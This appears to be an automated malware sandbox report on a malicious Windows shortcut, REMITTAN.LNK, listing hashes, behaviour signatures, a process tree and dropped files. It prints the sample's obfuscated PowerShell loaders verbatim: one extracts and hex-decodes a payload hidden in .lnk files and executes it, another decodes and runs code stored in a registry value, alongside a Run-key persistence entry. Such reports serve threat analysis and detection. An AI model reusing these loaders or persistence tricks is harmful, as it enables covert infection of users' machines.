Analysis
- max time kernel: 1191s
- max time network: 1193s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 27-07-2021 17:40

Static task: static1
Behavioral task: behavioral1
- Sample: REMITTAN.LNK
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: REMITTAN.LNK
- Resource: win10v20210408
General
- Target: REMITTAN.LNK
- Size: 4.3MB
- MD5: cc2a7754840911050d768c6be92005a6
- SHA1: 6eb79a31cc322a1a6c4b18bb1c9844108b57313c
- SHA256: ac8ec0eddd80b41d238c54f1262caefd6e80312826157564e933ff35be63c6cd
- SHA512: 02f3ee8eaad9adaa3baafd39f94f4115fec3d0f97b67a4f8fbf6b342db95681a07eefd2192201d5b8e1d888818b3615d7ff10d77b1f509056091b007f6e541db
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes: PID 580 client.exe
- Loads dropped DLL (1 IoC)
  Processes: PID 1484 rundll32.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: powershell.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main"
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: PID 2740 powershell.exe (3 events), PID 740 powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: PID 2740 powershell.exe (Token: SeDebugPrivilege), PID 740 powershell.exe (Token: SeDebugPrivilege)
- Suspicious use of WriteProcessMemory (17 IoCs)
  Processes (source process wrote to memory of target process):
  PID 808 cmd.exe -> PID 2740 powershell.exe (2 events)
  PID 2740 powershell.exe -> PID 1172 csc.exe (2 events)
  PID 1172 csc.exe -> PID 3648 cvtres.exe (2 events)
  PID 2740 powershell.exe -> PID 60 csc.exe (2 events)
  PID 60 csc.exe -> PID 3912 cvtres.exe (2 events)
  PID 2740 powershell.exe -> PID 580 client.exe (3 events)
  PID 2740 powershell.exe -> PID 1484 rundll32.exe (2 events)
  PID 1484 rundll32.exe -> PID 740 powershell.exe (2 events)
Processes
- (depth 1) C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\REMITTAN.LNK
  Signatures: Suspicious use of WriteProcessMemory
  - (depth 2) C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dS($A) {$kD = $Null;Get-ChildItem $A -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$Hu = [String](Get-Content $_.FullName);$Bz = 'QCASPHONCWMSJSYHBDCYJKMQSIABRBQF';$b = $Hu.IndexOf($Bz);if($b -ne -1) {$Ko = $Hu.SubString($b);$kD = $Ko.Replace($Bz,'')}};return $kD};function sH($Gt) {$Bg = [Text.StringBuilder]::New();for($aI=0;$aI -lt $Gt.Length;$aI+=2){[void]$Bg.Append([char][int]('0x'+$Gt.Substring($aI,2)))}return $Bg.ToString()}$kD = dS $(Get-Location).Path;if($kD -eq $Null) {$kD = dS $($env:TEMP)};$e = [ScriptBlock]::Create((sH $kD));$e.Invoke();
    Signatures: Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - (depth 3) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmp" "c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMP"
    - (depth 3) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmp" "c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMP"
    - (depth 3) C:\Users\Admin\AppData\Roaming\client.exe
      Command line: "C:\Users\Admin\AppData\Roaming\client.exe"
      Signatures: Executes dropped EXE
    - (depth 3) C:\Windows\system32\rundll32.exe
      Command line: "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main
      Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
      - (depth 4) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (command line and signatures follow)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x6
3,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: cd7fb3d11c938541ac33d6fd4089e437
  SHA1: dcb4c9240c96520dfa600dd31c1f9b1f59564a18
  SHA256: 275f6b0e155160d6c34d9a60887766ceec17fdf2e5ec0088cb293fd92b773cd6
  SHA512: 735a5a41fb938921d87ca078e8fe1194576ab6ab4754eda675a957582ca8acc02639b7caabc60578b8a147f60bc99a0c1e1d943418a4b98dc23a241cb9ed72ae
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 11e90a14af29438d79bb05a1bc0c4435
  SHA1: 3c6160e71249177d3c904b5be516b1593cbdc1a9
  SHA256: ce1bdb1a1cc5c5597ea7c295d7044a5f5076163cffb109291703201bad2265e0
  SHA512: a94ac18320cdef0dab7dae2e67691d89ef08760b630c054d89a3bf00ee0060d45eba15e889da9e26d942d4803e795a01e2e5b214c0ef6fa5d6f7af10e20994ab
- C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmp
  MD5: 80109eccd7f5926ffbb793ee9a23fde3
  SHA1: c6bdfeb1e35498ba9ccc73f60b0fe2d7652f720a
  SHA256: e6e87e8144550fcbf4e81adf94003683b674f0bd8c51728f7e77840e6aa0f6d3
  SHA512: 087e3b909a8b7508921f61cd57023c0e384c2891d0c5b5ee097df702ef539674902b427917c68109449dc0d6a022af5828157379d43dd9d13445a86bcfcff23e
- C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmp
  MD5: c9be156faca90ca5330c175facd6fbee
  SHA1: c97f1624a1307fd7c6ad71f3a85a6671db268fcc
  SHA256: 07ab1e7340b8b954719ce9c25f11527f26f77920effe16d17eddcaf4790bed62
  SHA512: c1c34190bac066b53d0f4f6740b5e81351c82e748a898b94f0ad08d6312b86acbcd19fc06bd55320de45d06947e595ce68354da6a81b77dcbce774e712d42172
- C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.dll
  MD5: 9cf0943883366f1e015177edaaa355a3
  SHA1: 6d4d1015992ac6bc916afc384302ab2f29671ad0
  SHA256: decb531e262a7111986259bcd748eef1cc892183d953ef68e17f8aadf6e1c297
  SHA512: 4253fd687201b5d5ec03f0530d885c4dcb50bb7db4bf7296166c8aa9ea92d05df1aa27c0075a1e0862d4a849cddc07e46f6f988d38dfaaa54f1e1fe418b1dbb0
- C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.dll
  MD5: 666d21bb7a7b9253c450732548830370
  SHA1: 2d71ed5f55f873a9bb9f48f3bc1ba6c30cfc8566
  SHA256: 40e48a58693dc878fe85f32ce3e70b067d3cb1fc17737eae33dbd23aba8df051
  SHA512: 730533d7d230d0999eb269a15d629f8442754c2645313db100ae10dae6c6153847a43b6dc703a91e14de2e5493a06bffce033fc1a4e56c4b71a1ec7e387c2865
- C:\Users\Admin\AppData\Roaming\client.exe
  MD5: 7574d81f10afb1cfdc4ac7acca1bff83
  SHA1: 478389bfdd75704fe7cd5d911514b9649857b798
  SHA256: 263e81885e5402a53346435c091dd904bc77917cfd348d0c7219fe110d10345a
  SHA512: c34463a21bb28b410f6586c86cfbf2f530da03c7ca705cdb4e383b4cedcd045d8b8fa13e24e49c03876a9b0a6a9ee7a049e5406a6495418df34f34b2ed524585
- C:\Users\Admin\AppData\Roaming\userpref.dll
  MD5: 5b2e8b0887e41ff72ac66799beeccb90
  SHA1: 82bbe01b7a2cb252892a5bed5d5af58fb641cd38
  SHA256: 739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441
  SHA512: 3ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53
- \??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMP
  MD5: 78a449d2c0e2ccb43faf18fed32dca30
  SHA1: 0c02e1fd4ef2da744dcc2ea52caa12ab970902c8
  SHA256: 1c04f39a87d5429a7d4e35b8480b3502ba533b4ae79222c7d61d8ffcd64df695
  SHA512: 54ee7c9cc540343b71650e0e3df2f2f667338977b2741ae8a5d1ee0ac47f390cde046b36aa85bb16be177842b3e7d428b6673849a70d62960c9019c546366641
- \??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.0.cs
  MD5: c0136606a60235ac4eedf5ebfbf72242
  SHA1: 3adc968e7d42959b5b6892ad9836b9e5a7a80247
  SHA256: 36a3409023121f56e60418e19521f1241ee5ab41b8c299d04c53fe63a83a054f
  SHA512: 1c09303dc198f6cd9d2f2f73290089f3d4056379e4f76ec081871b06b920b5e548b017a047eeadcb535761f5c436f6a4abec7a848337c1fe65209d9cf43abaed
- \??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdline
  MD5: 17b4e57d6258569b80d58f485a6883c1
  SHA1: 532fbcc07ead4c5e52445bd897831cf5c32a8180
  SHA256: 943413d988e6a9625ba9b430c05392b7e8f173d41da993a6caa091e116501cc9
  SHA512: 1aa38af857867c9f8454822788aacc01380d500195440c0475403f24cdbbe5247e3b37395879cb0f1f47c1f6b6d3c5bc439ac72f5ccb21551ae4666cbeef0710
- \??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMP
  MD5: d07751958882403469822ca11b3224dc
  SHA1: bf949bcdbf14a64deac3b950b38689d84f036ac1
  SHA256: 5746a4009ae4fd2da725c809613f99e4f4ea16dfa92429e9d70acb3acf0aa0c1
  SHA512: 4785ce7d35a2d6e9841704bc747a1488e74ca4a7d24ed62d2a28a4aa0bd65ee00bc36ef1e4d7f7924fdfe3d69c9ecdb726fc1c862e9b770fb65a50b4b63a3452
- \??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.0.cs
  MD5: 7e8be7de46cb8a991a864885286e1db9
  SHA1: 600af06d154bc655d186b295205542a049957ae8
  SHA256: 2d66ad50bdbe759adf78a4f7de6f39c4d98b49ad83083eae1ea95130affa9ac4
  SHA512: b0b01f8cad3150c16dbcc198ad15ed2c117bbfcfd5969438646b7c10de95939f238775e0faf7404e633232cfee55281a25b8d3762c0542cb3d2df9def4ba9653
- \??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdline
  MD5: f02c668c8c79e89880c7fdfc0133ff96
  SHA1: 02e191ddf50ef2593110b1604d8bdb84b6b7e311
  SHA256: 2ea32315c363303b3619f2241b9dd31e619129b8bb50ad583eb386f13ce3c5e7
  SHA512: 9b915869cafa6ca53066de0d7af2ede052a5950bb566859243bf49486251bd9d268350c49311890d728149e0ae79faf4c8c6d403dee31bb06c65a3f360c092a7
- \Users\Admin\AppData\Roaming\userpref.dll
  MD5: 5b2e8b0887e41ff72ac66799beeccb90
  SHA1: 82bbe01b7a2cb252892a5bed5d5af58fb641cd38
  SHA256: 739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441
  SHA512: 3ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53
- memory/60-153-0x0000000000000000-mapping.dmp
- memory/580-179-0x00000000007E0000-0x00000000007E1000-memory.dmp (Filesize: 4KB)
- memory/580-166-0x0000000000000000-mapping.dmp
- memory/580-215-0x0000000000800000-0x000000000081A000-memory.dmp (Filesize: 104KB)
- memory/740-213-0x00000196F6F96000-0x00000196F6F98000-memory.dmp (Filesize: 8KB)
- memory/740-192-0x00000196F6F93000-0x00000196F6F95000-memory.dmp (Filesize: 8KB)
- memory/740-190-0x00000196F6F90000-0x00000196F6F92000-memory.dmp (Filesize: 8KB)
- memory/740-176-0x0000000000000000-mapping.dmp
- memory/1172-137-0x0000000000000000-mapping.dmp
- memory/1484-172-0x0000000000000000-mapping.dmp
- memory/2740-123-0x0000021772CB0000-0x0000021772CB1000-memory.dmp (Filesize: 4KB)
- memory/2740-124-0x00000217720B0000-0x00000217720B2000-memory.dmp (Filesize: 8KB)
- memory/2740-125-0x00000217720B3000-0x00000217720B5000-memory.dmp (Filesize: 8KB)
- memory/2740-132-0x00000217720B6000-0x00000217720B8000-memory.dmp (Filesize: 8KB)
- memory/2740-161-0x00000217720B8000-0x00000217720B9000-memory.dmp (Filesize: 4KB)
- memory/2740-144-0x0000021772C70000-0x0000021772C71000-memory.dmp (Filesize: 4KB)
- memory/2740-119-0x00000217721C0000-0x00000217721C1000-memory.dmp (Filesize: 4KB)
- memory/2740-160-0x0000021772C80000-0x0000021772C81000-memory.dmp (Filesize: 4KB)
- memory/2740-114-0x0000000000000000-mapping.dmp
- memory/3648-140-0x0000000000000000-mapping.dmp
- memory/3912-156-0x0000000000000000-mapping.dmp